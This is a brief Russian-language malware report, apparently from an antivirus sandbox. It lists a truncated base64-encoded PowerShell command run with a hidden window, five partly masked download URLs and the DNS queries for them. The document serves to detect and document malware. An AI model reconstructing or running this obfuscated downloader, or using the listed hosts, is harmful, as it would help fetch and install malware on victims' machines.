Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGAFYARgBBAEMAbQB0AGcAPQAnAFQAUABLAEYATAB4AGsAdwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAYwB1AGAAUgBJAHQAeQBwAFIAbwBUAE8AYABjAGAATwBsACIAIAA9AC...
- http://oa###project.us/news/4KTOf/
- http://ob###ai.co.jp/sys/7zi27420/
- http://pa####hazarika.com/bestsmarttvindia.com/Bn1u/
- http://ra###nowell.com/images/SE2150/
- http://de##ath.org/stats/SB/
- DNS ASK oa###project.us
- DNS ASK ob###ai.co.jp
- DNS ASK pa####hazarika.com
- DNS ASK ra###nowell.com
- DNS ASK de##ath.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGAFYARgBBAEMAbQB0AGcAPQAnAFQAUABLAEYATAB4AGsAdwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAYwB1AGAAUgBJAHQAeQBwAFIAbwBUAE8AYABjAGAATwBsACIAIAA9AC...' (со скрытым окном)